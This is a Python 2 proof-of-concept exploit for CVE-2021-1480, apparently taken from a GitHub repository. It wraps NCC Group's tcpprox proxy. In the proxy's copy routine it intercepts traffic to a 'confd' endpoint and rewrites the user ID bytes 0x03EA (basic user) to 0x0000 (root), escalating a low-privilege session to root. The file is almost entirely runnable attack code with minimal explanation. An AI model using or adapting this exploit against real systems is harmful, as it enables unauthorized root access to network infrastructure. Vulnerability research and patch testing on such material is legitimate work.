README.md
Rendering markdown...
#!/usr/bin/env python
"""
POC for the CVE-2021-1480.
Source of the proxy: https://github.com/nccgroup/tcpprox/blob/master/prox.py
"""
"""
TCP Proxy server. Listens on a port for connections, initiates
a connection to the real server, and copies data between the
two connections. Optionally logs the data.
TODO:
- non-blocking connect ?
- possibly do non-blocking ssl handshaking?
- cleaner shutdown?
"""
from socket import *
import errno, optparse, os, platform, socket, ssl, struct, time
from select import *
class Error(Exception) :
pass
def fail(fmt, *args) :
print "error:", fmt % args
raise SystemExit(1)
def tcpListen(six, addr, port, blk, sslProto, cert=None, key=None) :
"""Return a listening server socket."""
s = socket.socket(AF_INET6 if six else AF_INET, SOCK_STREAM)
if six and hasattr(socket, 'IPV6_V6ONLY') :
s.setsockopt(IPPROTO_IPV6, IPV6_V6ONLY, 0)
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
s.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
if sslProto is not None :
if not os.path.exists(cert) :
fail("cert file %s doesnt exist", cert)
if key and not os.path.exists(key) :
fail("cert key %s doesnt exist", key)
s = ssl.wrap_socket(s, ssl_version=sslProto, server_side=True, certfile=cert, keyfile=key)
s.bind((addr,port))
s.listen(5)
s.setblocking(blk)
return s
def tcpConnect(six, addr, port, blk, sslProto, clientCert=None) :
"""Returned a connected client socket (blocking on connect...)"""
s = socket.socket(AF_INET6 if six else AF_INET, SOCK_STREAM)
s.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
if sslProto is not None :
if clientCert is None:
certfile = None
keyfile = None
else:
certfile = clientCert + '.cert'
keyfile = clientCert + '.key'
s = ssl.wrap_socket(s, certfile=certfile, keyfile=keyfile, cert_reqs=ssl.CERT_NONE, ssl_version=sslProto)
s.connect((addr,port))
s.setblocking(blk)
return s
def safeClose(x) :
try :
x.close()
except Exception, e :
pass
def getSslVers(opt, enable) :
if enable :
if opt.sslV3 :
return ssl.PROTOCOL_SSLv3
elif opt.TLS :
return ssl.PROTOCOL_TLSv1
else :
return ssl.PROTOCOL_SSLv23
class Server(object) :
def __init__(self, opt, q) :
self.opt = opt
sslCert = opt.cert + ".pem"
ver = getSslVers(opt, opt.sslIn)
self.sock = tcpListen(opt.ip6, opt.bindAddr, opt.locPort, 0, ver, sslCert, None)
self.q = q
def preWait(self, rr, r, w, e) :
r.append(self.sock)
def postWait(self, r, w, e) :
if self.sock in r :
try :
cl,addr = self.sock.accept()
except ssl.SSLError, e :
print "ssl error during accept", e
return
cl.setblocking(0)
self.q.append(Proxy(self.opt, cl, addr))
if self.opt.oneshot :
safeClose(self.sock)
return 'elvis has left the building'
class Half(object) :
"""a single connection"""
def __init__(self, opt, sock, addr, dir) :
self.opt = opt
self.sock = sock
self.addr = addr
self.dir = dir
self.name = "peer" if self.dir else "client"
self.queue = []
self.dest = None
self.err = None
self.ready = False
# XXX handle ssl
def preWait(self, rr, r, w, e) :
if self.ready :
rr.append(self.sock)
r.append(self.sock)
if self.queue :
w.append(self.sock)
def postWait(self, r, w, e) :
if not self.err and self.sock in w and self.queue :
self.writeSome()
if not self.err and self.sock in r :
self.ready = True
self.copy()
return self.err
def error(self, msg, e) :
print "%s on %s: %r %s" % (msg, self.name, e, e)
self.err = "error on " + self.name
return self.err
def writeSome(self) :
try :
n = self.sock.send(self.queue[0])
except ssl.SSLError, e :
# XXX can we get WantRead here?
if e.args[0] == ssl.SSL_ERROR_WANT_WRITE :
n = 0
else :
return self.error("send ssl error", e)
except Exception, e :
return self.error("send error", e)
if n != len(self.queue[0]) :
self.queue[0] = self.queue[0][n:]
else :
del self.queue[0]
def copy(self) :
try :
buf = self.sock.recv(4096)
except ssl.SSLError, e :
# XXX can we get WantWrite here?
if e.args[0] == ssl.SSL_ERROR_WANT_READ :
self.ready = False
return
if e.args[0] == ssl.SSL_ERROR_EOF :
return self.error("eof", e)
return self.error("recv ssl error", e)
except socket.error, e :
if e.errno == errno.EWOULDBLOCK :
self.ready = False
return
return self.error("recv socket error", e)
except Exception, e :
return self.error("recv error", e)
if len(buf) == 0 :
return self.error("eof", 0)
for mod in self.opt.filters :
buf = mod.filter(self.addr, self.dir, buf)
# This is a simple TCP proxy which redirects and modify the input to the legitimate agent
#########################################################################################
### Here we modify the request if we encounter the USER ID 0x3EA = basic, to 0 = root ###
#########################################################################################
print("Received: {}".format(buf.encode("hex")))
if "03EA" in buf.encode("hex").upper():
print(type(buf))
buf = buf.replace("\x03\xea", "\x00\x00")
print("DATA modified, sending back to the legitimate confd endpoint -> {}".format(buf.encode("hex")))
self.dest.queue.append(buf)
if self.opt.log :
now = time.time()
a = '%s:%s' % self.addr
self.opt.log.write("%f %s %s %s\n" % (now, a, self.dir, buf.encode('hex')))
self.opt.log.flush()
def close(self) :
safeClose(self.sock)
class Proxy(object) :
"""A client connection and the peer connection he proxies to"""
def __init__(self, opt, sock, addr) :
print "New client %s" % (addr,)
self.opt = opt
if opt.originalDst :
try :
sockaddr_in = sock.getsockopt(socket.SOL_IP, 80, 16) # SO_ORIGINAL_DST = 80
except socket.error :
raise Error("SO_ORIGINAL_DST not supported on this platform")
_, port, a, b, c, d = struct.unpack('!HHBBBB', sockaddr_in[:8])
print('Original destination was: %d.%d.%d.%d:%d' % (a, b, c, d, port))
self.opt.addr = '%d.%d.%d.%d' % (a, b, c, d)
self.opt.port = port
self.cl = Half(opt, sock, addr, 'i')
# note: blocking connect for simplicity for now...
ver = getSslVers(opt, opt.sslOut)
peer = tcpConnect(opt.ip6, opt.addr, opt.port, 0, ver, opt.clientCert)
self.peer = Half(opt, peer, addr, 'o')
self.cl.dest = self.peer
self.peer.dest = self.cl
self.err = None
def preWait(self, rr, r, w, e) :
self.cl.preWait(rr, r,w,e)
self.peer.preWait(rr, r,w,e)
def postWait(self, r, w, e) :
if not self.err :
self.err = self.cl.postWait(r,w,e)
if not self.err :
self.err = self.peer.postWait(r,w,e)
if self.err :
self.cl.close()
self.peer.close()
return self.err
def serverLoop(opt) :
qs = []
qs.append(Server(opt, qs))
while qs :
# note: rr holds "read already ready"
# meaning it wasnt fully drained last time
rr,r,w,e = [], [], [], []
for q in qs :
q.preWait(rr, r, w, e)
timeo = 10.0 if not rr else 0.0
r,w,e = select(r, w, e, timeo)
r = set(r).union(rr)
for q in qs :
if q.postWait(r, w, e) :
qs.remove(q)
print 'done'
def autoCert(cn, caName, name) :
"""Create a certificate signed by caName for cn into name."""
import ca # requires M2Crypto!
cac, cak = ca.loadOrDie(caName)
c,k = ca.makeCert(cn, ca=cac, cak=cak)
ca.saveOrDie(c, k, name)
def getopts() :
p = optparse.OptionParser(usage="usage: %prog [opts] addr port")
p.add_option('-6', dest='ip6', action='store_true', help="Use IPv6")
p.add_option("-b", dest="bindAddr", default="0.0.0.0", help="Address to bind to")
p.add_option("-L", dest="locPort", type="int", help="Local port to listen on")
p.add_option("-s", dest="ssl", action="store_true", help="Use SSL for incoming and outgoing connections")
p.add_option("--ssl-in", dest="sslIn", action="store_true", help="Use SSL for incoming connections")
p.add_option("--ssl-out", dest="sslOut", action="store_true", help="Use SSL for outgoing connections")
p.add_option('-3', dest='sslV3', action='store_true', help='Use SSLv3 protocol')
p.add_option('-T', dest='TLS', action='store_true', help='Use TLSv1 protocol')
p.add_option("-C", dest="cert", default=None, help="Cert for SSL")
p.add_option("-A", dest="autoCname", action="store", help="CName for Auto-generated SSL cert")
p.add_option('-1', dest='oneshot', action='store_true', help="Handle a single connection")
p.add_option("-l", dest="logFile", help="Filename to log to")
p.add_option("-m", dest="modules", action="append", default=[], help="filtering modules")
p.add_option("-O", dest="originalDst", action="store_true", help="Use SO_ORIGINAL_DST for destination")
p.add_option("-c", dest="clientCert", default=None, help="Client certificate to present to server")
opt,args = p.parse_args()
if opt.ssl :
opt.sslIn = True
opt.sslOut = True
if opt.sslV3 and opt.TLS :
p.error("-3 and -T cannot be used together")
if opt.bindAddr == '0.0.0.0' and opt.ip6 :
opt.bindAddr = '::'
if opt.originalDst and platform.system() != "Linux" :
p.error("SO_ORIGINAL_DST is only supported in Linux systems")
if len(args) != 2 and not opt.originalDst :
p.error("specify address and port or use -O")
if opt.cert is None :
opt.cert = "ca" if opt.autoCname else "cert"
if opt.ssl and opt.cert is None :
if opt.autoCname is not None :
p.error("specify CA cert")
else :
p.error("specify SSL cert")
if not opt.originalDst :
opt.addr = args[0]
try :
opt.port = int(args[1])
except ValueError :
p.error("invalid port: " + args[1])
if opt.locPort == None :
if opt.originalDst :
p.error("-O requires -L")
else :
opt.locPort = opt.port
return opt
def initModule(modstr) :
modname, modargs = modstr.split(':', 1) if ':' in modstr else (modstr,"")
try :
mod = __import__(modname)
except ImportError :
fail("could not import %r" % modname)
mod.init(modargs)
return mod
def main() :
opt = getopts()
if opt.sslIn and opt.autoCname :
autoCert(opt.autoCname, opt.cert, "autocert")
opt.cert = "autocert"
opt.log = file(opt.logFile, 'w') if opt.logFile else None
opt.filters = map(initModule, opt.modules)
serverLoop(opt)
if __name__ == '__main__' :
main()